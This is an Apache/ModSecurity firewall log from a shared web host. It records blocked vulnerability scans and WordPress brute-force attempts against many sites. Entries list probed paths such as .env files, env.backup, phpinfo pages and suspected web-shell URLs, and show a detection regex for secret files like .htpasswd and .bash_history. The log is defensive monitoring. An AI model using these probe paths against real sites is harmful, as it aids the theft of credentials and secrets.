[Tue May 26 15:48:23.216756 2026] [security2:error] [pid 747840:tid 748042] [client 108.201.155.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzbom6MwAuYuZKxvnqdwAAAVI"]
[Tue May 26 15:48:23.500005 2026] [security2:error] [pid 747840:tid 748057] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzb4m6MwAuYuZKxvnqgQAAAWE"]
[Tue May 26 15:48:25.475364 2026] [security2:error] [pid 745492:tid 745725] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzcYmEQglTmoWcfxJ37gAAAOk"]
[Tue May 26 15:48:26.928071 2026] [security2:error] [pid 745492:tid 745681] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzcomEQglTmoWcfxJ4EAAAAL0"]
[Tue May 26 15:48:28.597994 2026] [security2:error] [pid 745492:tid 745626] [client 223.123.35.44:36224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzdImEQglTmoWcfxJ4NgAAAIY"]
[Tue May 26 15:48:28.598134 2026] [security2:error] [pid 745492:tid 745626] [client 223.123.35.44:36224] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzdImEQglTmoWcfxJ4NgAAAIY"]
[Tue May 26 15:48:28.730362 2026] [security2:error] [pid 745492:tid 745578] [remote 209.42.20.53:45260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVzdImEQglTmoWcfxJ4NQAA9FI"]
[Tue May 26 15:48:29.395416 2026] [security2:error] [pid 745492:tid 745710] [client 216.41.233.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzdYmEQglTmoWcfxJ4UQAAANo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:48:29.770671 2026] [security2:error] [pid 745492:tid 745734] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzdYmEQglTmoWcfxJ4TwAAAPI"]
[Tue May 26 15:48:30.469759 2026] [security2:error] [pid 745492:tid 745697] [client 103.153.130.62:64991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzdomEQglTmoWcfxJ4ZgAAAM0"]
[Tue May 26 15:48:30.469933 2026] [security2:error] [pid 745492:tid 745697] [client 103.153.130.62:64991] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzdomEQglTmoWcfxJ4ZgAAAM0"]
[Tue May 26 15:48:31.082156 2026] [security2:error] [pid 745492:tid 745748] [client 216.41.233.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzd4mEQglTmoWcfxJ4cQAAAQA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1251111&moderation-hash=e5e4a64727edde05a8cd7f68cb7df4b7
[Tue May 26 15:48:31.631522 2026] [security2:error] [pid 747840:tid 748021] [client 45.148.10.159:35986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/awstats/.env"] [unique_id "ahVzd4m6MwAuYuZKxvnq_AAAAT0"]
[Tue May 26 15:48:31.921718 2026] [security2:error] [pid 747840:tid 747978] [client 45.148.10.159:35986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/conf/.env"] [unique_id "ahVzd4m6MwAuYuZKxvnrAQAAARI"]
[Tue May 26 15:48:31.981776 2026] [security2:error] [pid 747840:tid 748046] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzd4m6MwAuYuZKxvnq-AAAAVY"]
[Tue May 26 15:48:32.656408 2026] [security2:error] [pid 747840:tid 747981] [client 45.148.10.159:37786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/cron/.env"] [unique_id "ahVzeIm6MwAuYuZKxvnrDwAAARU"]
[Tue May 26 15:48:32.787851 2026] [security2:error] [pid 747840:tid 748054] [client 45.148.10.159:37786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/www/.env"] [unique_id "ahVzeIm6MwAuYuZKxvnrEwAAAV4"]
[Tue May 26 15:48:32.922246 2026] [security2:error] [pid 747840:tid 747971] [client 45.148.10.159:37786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/docker/.env"] [unique_id "ahVzeIm6MwAuYuZKxvnrFwAAAQs"]
[Tue May 26 15:48:33.051028 2026] [security2:error] [pid 747840:tid 747972] [client 45.148.10.159:37786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/docker/app/.env"] [unique_id "ahVzeYm6MwAuYuZKxvnrGAAAAQw"]
[Tue May 26 15:48:34.267874 2026] [core:error] [pid 745492:tid 745641] [client 198.235.24.137:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:48:34.267905 2026] [core:error] [pid 745492:tid 745641] [client 198.235.24.137:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:48:34.396120 2026] [security2:error] [pid 747840:tid 748091] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzeYm6MwAuYuZKxvnrKwAAAYM"]
[Tue May 26 15:48:34.838189 2026] [security2:error] [pid 747840:tid 747994] [client 45.148.10.159:37786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/env.backup"] [unique_id "ahVzeom6MwAuYuZKxvnrPQAAASI"]
[Tue May 26 15:48:35.969410 2026] [security2:error] [pid 745492:tid 745713] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVze4mEQglTmoWcfxJ40wAAAN0"]
[Tue May 26 15:48:38.156318 2026] [security2:error] [pid 745492:tid 745732] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzfYmEQglTmoWcfxJ4-AAAAPA"]
[Tue May 26 15:48:38.469211 2026] [security2:error] [pid 747840:tid 748079] [client 223.123.35.44:36225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzfom6MwAuYuZKxvnrbAAAAXc"]
[Tue May 26 15:48:38.469349 2026] [security2:error] [pid 747840:tid 748079] [client 223.123.35.44:36225] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzfom6MwAuYuZKxvnrbAAAAXc"]
[Tue May 26 15:48:40.213764 2026] [security2:error] [pid 745492:tid 745676] [client 108.136.131.13:64744] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cpcontacts.contabilidadecarioca.com.br"] [uri "/filemanager/dialog.php"] [unique_id "ahVzgImEQglTmoWcfxJ5GwAAALg"]
[Tue May 26 15:48:40.461521 2026] [security2:error] [pid 747840:tid 748090] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzgIm6MwAuYuZKxvnrjAAAAYI"]
[Tue May 26 15:48:41.037508 2026] [security2:error] [pid 745492:tid 745681] [client 103.153.130.62:65276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzgImEQglTmoWcfxJ5IwAAAL0"]
[Tue May 26 15:48:41.037768 2026] [security2:error] [pid 745492:tid 745681] [client 103.153.130.62:65276] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzgImEQglTmoWcfxJ5IwAAAL0"]
[Tue May 26 15:48:42.399552 2026] [security2:error] [pid 745492:tid 745699] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzgYmEQglTmoWcfxJ5OgAAAM8"]
[Tue May 26 15:48:43.080475 2026] [security2:error] [pid 745492:tid 745719] [client 45.148.10.159:48658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/xampp/phpinfo.php"] [unique_id "ahVzg4mEQglTmoWcfxJ5SQAAAOM"]
[Tue May 26 15:48:43.830902 2026] [security2:error] [pid 747840:tid 747977] [client 45.148.10.159:48670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/lara/info.php"] [unique_id "ahVzg4m6MwAuYuZKxvnruQAAARE"]
[Tue May 26 15:48:44.506778 2026] [security2:error] [pid 745492:tid 745682] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzhImEQglTmoWcfxJ5UgAAAL4"]
[Tue May 26 15:48:45.881845 2026] [security2:error] [pid 747840:tid 748031] [client 74.7.230.51:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "cti.hn"] [uri "/index.php"] [unique_id "ahVzhIm6MwAuYuZKxvnrwQAAAUc"]
[Tue May 26 15:48:45.882824 2026] [security2:error] [pid 747840:tid 748085] [client 74.7.230.51:39712] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "cti.hn"] [uri "/robots.txt"] [unique_id "ahVzhIm6MwAuYuZKxvnrwAABfUc"]
[Tue May 26 15:48:45.974213 2026] [security2:error] [pid 745492:tid 745686] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzhYmEQglTmoWcfxJ5dgAAAMI"]
[Tue May 26 15:48:46.489786 2026] [security2:error] [pid 747840:tid 748044] [client 143.110.243.118:35200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/iu.php"] [unique_id "ahVzhom6MwAuYuZKxvnr0QAAAVQ"]
[Tue May 26 15:48:46.911540 2026] [security2:error] [pid 747840:tid 747913] [remote 121.200.216.55:57638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVzhom6MwAuYuZKxvnr1AABKUg"]
[Tue May 26 15:48:48.834580 2026] [security2:error] [pid 745492:tid 745717] [client 45.148.10.159:48696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/lara/phpinfo.php"] [unique_id "ahVziImEQglTmoWcfxJ5uAAAAOE"]
[Tue May 26 15:48:49.009191 2026] [security2:error] [pid 745492:tid 745714] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVziImEQglTmoWcfxJ5sgAAAN4"]
[Tue May 26 15:48:49.942308 2026] [security2:error] [pid 747840:tid 748000] [client 14.165.139.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVziYm6MwAuYuZKxvnr8QAAASg"]
[Tue May 26 15:48:50.906940 2026] [security2:error] [pid 747840:tid 748031] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVziom6MwAuYuZKxvnsEQAAAUc"]
[Tue May 26 15:48:50.928826 2026] [security2:error] [pid 747840:tid 748009] [client 160.119.76.58:43146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVziom6MwAuYuZKxvnsFAAAATE"]
[Tue May 26 15:48:51.259884 2026] [security2:error] [pid 747840:tid 748059] [client 103.153.130.62:49181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzi4m6MwAuYuZKxvnsIgAAAWM"]
[Tue May 26 15:48:51.260141 2026] [security2:error] [pid 747840:tid 748059] [client 103.153.130.62:49181] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzi4m6MwAuYuZKxvnsIgAAAWM"]
[Tue May 26 15:48:51.380667 2026] [security2:error] [pid 747840:tid 748038] [client 160.119.76.58:43164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahVzi4m6MwAuYuZKxvnsJQAAAU4"]
[Tue May 26 15:48:52.390728 2026] [security2:error] [pid 747840:tid 748014] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzi4m6MwAuYuZKxvnsNwAAATY"]
[Tue May 26 15:48:53.651468 2026] [security2:error] [pid 747840:tid 747920] [remote 195.250.23.247:54060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVzjYm6MwAuYuZKxvnsVwABR08"]
[Tue May 26 15:48:54.957209 2026] [security2:error] [pid 747840:tid 747958] [remote 160.119.76.58:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVzjom6MwAuYuZKxvnscwABRnU"]
[Tue May 26 15:48:55.054361 2026] [security2:error] [pid 747840:tid 747998] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzjom6MwAuYuZKxvnsaAAAASY"]
[Tue May 26 15:48:55.440011 2026] [security2:error] [pid 747840:tid 747841] [remote 160.119.76.58:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVzj4m6MwAuYuZKxvnsfQABVQA"]
[Tue May 26 15:48:56.147703 2026] [security2:error] [pid 745492:tid 745536] [remote 165.22.95.96:51338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVzj4mEQglTmoWcfxJ6CQAA9Sg"]
[Tue May 26 15:48:56.672464 2026] [security2:error] [pid 747840:tid 748064] [client 143.110.243.118:39584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/ccx/th3_err0r.php"] [unique_id "ahVzkIm6MwAuYuZKxvnsoAAAAWg"]
[Tue May 26 15:48:56.683947 2026] [security2:error] [pid 745492:tid 745740] [client 23.80.164.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzkImEQglTmoWcfxJ6DQAAAPg"], referer: https://www.anujtradingco.com/
[Tue May 26 15:48:56.971102 2026] [security2:error] [pid 747840:tid 748056] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzkIm6MwAuYuZKxvnsnQAAAWA"]
[Tue May 26 15:48:57.435606 2026] [security2:error] [pid 747840:tid 748046] [client 23.80.164.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzkYm6MwAuYuZKxvnsrQAAAVY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451778&moderation-hash=25ad70377f77ee74b252dc8173d3abf6
[Tue May 26 15:48:58.145508 2026] [security2:error] [pid 747840:tid 748007] [client 45.148.10.159:46762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/laravel/info.php"] [unique_id "ahVzkom6MwAuYuZKxvnswAAAAS8"]
[Tue May 26 15:48:58.578711 2026] [security2:error] [pid 747840:tid 748003] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzkom6MwAuYuZKxvnswQAAASs"]
[Tue May 26 15:48:58.952999 2026] [security2:error] [pid 747840:tid 748095] [client 35.199.175.60:53902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.175.199.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "quincaillerie.azurmediatec.com"] [uri "/xmlrpc.php"] [unique_id "ahVzkom6MwAuYuZKxvns0AAAAYc"]
